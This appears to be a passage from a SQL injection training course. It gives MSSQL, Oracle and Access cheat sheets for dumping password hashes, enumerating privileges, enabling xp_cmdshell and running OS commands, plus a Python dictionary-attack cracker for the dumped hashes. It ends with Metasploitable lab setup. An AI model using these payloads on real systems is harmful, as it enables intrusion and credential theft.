SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins -- priv, mssql 2005

List Privileges
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
-- current privs in 2005, 2008
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');
-- who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

List Tables
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

Find Tables From Column Name
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
This example works only for the current database. If you want to search another database, you need to specify the database name (e.g. replace sysobjects with mydb..sysobjects).

Command Execution
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it is disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv
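Both the MySQL and the MS SQL Server cheat sheets above stop at "dump the hashes and hand them to John the Ripper". The following added example (not code from the article) shows what the cracker actually does with those two hash formats, so you can recognise a dump and verify a guess offline: the MySQL 4.1+ PASSWORD() format stored in mysql.user.password ('*' followed by SHA1(SHA1(password)) in upper-case hex) and the SQL Server 2005/2008 sys.sql_logins.password_hash format (0x0100, a 4-byte salt, then SHA1 of the UTF-16LE password followed by the salt). The sample rows and the word list are constructed for the example.

```python
"""Verify candidate passwords against hashes dumped from mysql.user and
master.sys.sql_logins. Added example; not code from the article."""
import hashlib
from typing import Callable, Iterable, Optional


def mysql41_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + SHA1(SHA1(password)) as upper-case hex (41 chars)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mssql2005_hash(password: str, salt: bytes) -> bytes:
    """SQL Server 2005/2008 password_hash: 0x0100 || salt(4) || SHA1(UTF-16LE(pw) || salt)."""
    if len(salt) != 4:
        raise ValueError("SQL Server 2005 hashes use a 4-byte salt")
    digest = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    return b"\x01\x00" + salt + digest


def check_mysql41(stored: str, candidate: str) -> bool:
    """stored is the mysql.user.password column as dumped."""
    return stored.strip().upper() == mysql41_hash(candidate)


def check_mssql2005(stored: str, candidate: str) -> bool:
    """stored is the hex string fn_varbintohexstr() returns, with or without 0x."""
    hexstr = stored.strip()
    raw = bytes.fromhex(hexstr[2:] if hexstr[:2].lower() == "0x" else hexstr)
    # 26 bytes with version 0x0100 is the 2005/2008 layout. SQL Server 2000
    # (46 bytes) and 2012+ (0x0200, SHA-512) are different formats, rejected here.
    if len(raw) != 26 or raw[:2] != b"\x01\x00":
        return False
    salt = raw[2:6]
    return mssql2005_hash(candidate, salt) == raw


def crack(stored: str, wordlist: Iterable[str],
          check: Callable[[str, str], bool]) -> Optional[str]:
    """Dictionary attack: return the first word whose hash matches, else None."""
    for word in wordlist:
        if check(stored, word):
            return word
    return None


# Constructed sample dump, generated here so the example runs offline.
WORDLIST = ["123456", "password", "letmein", "msfadmin"]
SAMPLE_MYSQL_ROW = ("localhost", "webapp", mysql41_hash("letmein"))
SAMPLE_MSSQL_ROW = ("sa", "0x" + mssql2005_hash("msfadmin", b"\xde\xad\xbe\xef").hex())

if __name__ == "__main__":
    print("mysql.user", SAMPLE_MYSQL_ROW[1], "->",
          crack(SAMPLE_MYSQL_ROW[2], WORDLIST, check_mysql41))
    print("sql_logins", SAMPLE_MSSQL_ROW[0], "->",
          crack(SAMPLE_MSSQL_ROW[1], WORDLIST, check_mssql2005))
```

For real dumps use the tools: John the Ripper handles these as --format=mysql-sha1 and --format=mssql05, hashcat as modes 300 and 132. The MySQL format is unsalted, so identical passwords produce identical hashes across accounts and servers; the SQL Server format is salted per login, so each row has to be attacked separately.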
SQL Injection techniques for Oracle Database

Version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Comments
SELECT 1 FROM dual -- comment
-- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User
SELECT user FROM dual

List Users
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv

List Password Hashes
SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if the account is locked
SELECT name, spare4 FROM sys.user$ -- priv, 11g

List Databases
SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Also query the TNS listener for other databases.

List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SQL Injection techniques for MS Access Database

Version
Not supported

Comments
Not supported. The payloads below end in %00, a URL-encoded null byte, which truncates the rest of the application's query in place of a comment marker.

Current User
Not supported by default

Union Support
UNION attacks are supported, but the injected SELECT needs a valid table name in its FROM clause.

Sub query
Sub queries are supported (in the example below "TOP 1" makes the sub query return only one row):
' AND (SELECT TOP 1 'someData' FROM validTableName)%00

IF Statement
The IIF() function can be used: IIF(condition, value_if_true, value_if_false):
' UNION SELECT IIF(1=1,'a','b') FROM validTableName%00
returns 'a'

Execute OS Commands
The Shell() function can be used to run OS commands:
' AND Shell('cmd.exe /c echo hacked > C:\file.txt')
This is a short presentation covering these four databases; you need extensive, solid experience of writing the SQL statements that are commonly used in SQL injections regardless of the database type, namely SELECT, INSERT and UPDATE. You also need to know the default tables and schemas that already exist in these four databases; this is of the utmost importance.
Keep learning, keep hakin9!
Module 5 – Setting up a Lab for practicing SQL Injections
Introduction
So far you have been learning how to hack via SQL injections, both manually and with tools. Now, where should you practise? I will not say "go and hack live sites", as that would be unethical, but you can read my mind (if you can, please do).
In this module we will set up a test environment where you can practise your SQL injection techniques. Follow the instructions and enjoy the fun.
Virtual Lab Setup
• Downloading & Installing VirtualBox
• Downloading the Vulnerable Operating System
• Installing the Vulnerable Operating System as a Virtual Machine
Downloading & Installing VirtualBox
Download Link: https://www.virtualbox.org/wiki/Downloads.
Select and download the binary for your operating system; in our case we will be installing VirtualBox-4.3.12-93733-OSX from the download link above, as shown below.
Double-click the icon shown in step 1 of the figure above.
Continue the installation by clicking the Continue button.
Begin the installation by clicking the Continue button.
Select the installation location or customise the installation as shown above. However, it is recommended to leave the settings at their defaults and run the installation.
A successful installation shows the screen below.
The VirtualBox installation is now complete. Our next step is setting up the vulnerable box, a virtual machine hosting vulnerable web applications.
Vulnerable Operating System with Web Applications
Metasploitable is the deliberately vulnerable operating system best suited to practising all types of hacking attempts, including attacks on web applications.
Download Metasploitable from Rapid7.com and you'll be sure to get the latest, clean version of the vulnerable machine.
Download Link
https://information.rapid7.com/metasploitable-download.html
You need to complete a short form first so that the community knows who you are; downloading this vulnerable operating system is quick and easy.
Metasploitable comes as a zip archive; unzip it to get the files used for the virtual machine.
Installing the Vulnerable Operating System as a Virtual Machine
Open VirtualBox and click 'New' to start the virtual machine wizard. Type a name of your choice; I am using 'Metasploitable-2'. Choose 'Type' as Linux and 'Version' as Ubuntu. Click Next.
Choose a memory size appropriate to the RAM available on your host machine, although 1512MB is more than enough. Click Next.
In the hard drive window, select the 'Use an existing virtual hard drive file' option, browse to the folder where we extracted the zip archive and select the .vmdk file. Click Create.
Alternatively, you can continue with the 'Create a virtual hard drive now' option and change it to the Metasploitable hard drive later.
If you take that route, select VMDK (Virtual Machine Disk) as the disk type and continue setting up the virtual machine.
Use dynamic allocation of hard drive space, as we did previously for Kali Linux, and click Continue to move to the next step of the virtual machine creation.
Give the hard drive a convenient, easy-to-remember name. This is useful because the hard drive is saved as a file under that name, and a sensible naming convention makes it easier to move the file later if required.
Now select the Metasploitable disk image from the download you just extracted. Attach it as the hard drive and you are all set to boot this virtual machine as the vulnerable operating system in your virtual lab environment.
From here you proceed with a vulnerable operating system ready to be exploited in your virtual lab environment.
The default login is msfadmin/msfadmin; don't forget to change the password. Keep the VM on a host-only or NAT network: Metasploitable is deliberately full of remotely exploitable services and must never be bridged onto a real network.
Once it has booted, browse to the IP address of this machine in a web browser and you will find the following vulnerable web applications available for you to hack into!
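The steps above are the VirtualBox wizard clicked through by hand. As an added example (not part of the article), the same VM can be built from the command line with VBoxManage, the CLI that ships with VirtualBox; this saves time when you rebuild the lab often. It assumes the Metasploitable .vmdk has already been extracted, that the VirtualBox host-only interface vboxnet0 exists (create it with "VBoxManage hostonlyif create" if it does not), and uses 512 MB of RAM; the VM and controller names are the example's own choices. Host-only networking is used so the vulnerable guest is reachable from your host only.

```python
"""Build the Metasploitable VM from the command line instead of the wizard.

Added example; not code from the article. Requires VirtualBox's VBoxManage.
"""
import shutil
import subprocess
from pathlib import Path
from typing import List, Union


def build_commands(name: str, vmdk: Union[str, Path], memory_mb: int = 512,
                   hostonly_if: str = "vboxnet0") -> List[List[str]]:
    """The VBoxManage invocations equivalent to the wizard steps above.

    Host-only networking (assumption: vboxnet0 exists) keeps the vulnerable
    guest reachable from the host only, never from the real network.
    """
    return [
        # "New" -> name, Type: Linux, Version: Ubuntu
        ["VBoxManage", "createvm", "--name", name, "--ostype", "Ubuntu", "--register"],
        # memory size and the network adapter
        ["VBoxManage", "modifyvm", name, "--memory", str(memory_mb),
         "--nic1", "hostonly", "--hostonlyadapter1", hostonly_if],
        # "Use an existing virtual hard drive file": add a controller, attach the .vmdk
        ["VBoxManage", "storagectl", name, "--name", "IDE", "--add", "ide"],
        ["VBoxManage", "storageattach", name, "--storagectl", "IDE", "--port", "0",
         "--device", "0", "--type", "hdd", "--medium", str(vmdk)],
        # boot it without a console window
        ["VBoxManage", "startvm", name, "--type", "headless"],
    ]


def create_vm(name: str, vmdk: Union[str, Path], memory_mb: int = 512) -> None:
    """Validate the inputs, then run the commands in order, stopping on the first failure."""
    vmdk_path = Path(vmdk).expanduser().resolve()
    if not vmdk_path.is_file():
        raise FileNotFoundError(f"{vmdk_path}: extract the Metasploitable zip first")
    if shutil.which("VBoxManage") is None:
        raise RuntimeError("VBoxManage not found on PATH; install VirtualBox first")
    for cmd in build_commands(name, vmdk_path, memory_mb):
        subprocess.run(cmd, check=True)


if __name__ == "__main__":
    import sys
    # usage: python make_lab_vm.py /path/to/Metasploitable.vmdk
    create_vm("Metasploitable-2", sys.argv[1])
```

Once it is running, "VBoxManage guestproperty enumerate Metasploitable-2" or the login console shows the host-only address to browse to; "VBoxManage controlvm Metasploitable-2 poweroff" shuts it down again.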
Keep learning, keep hakin9!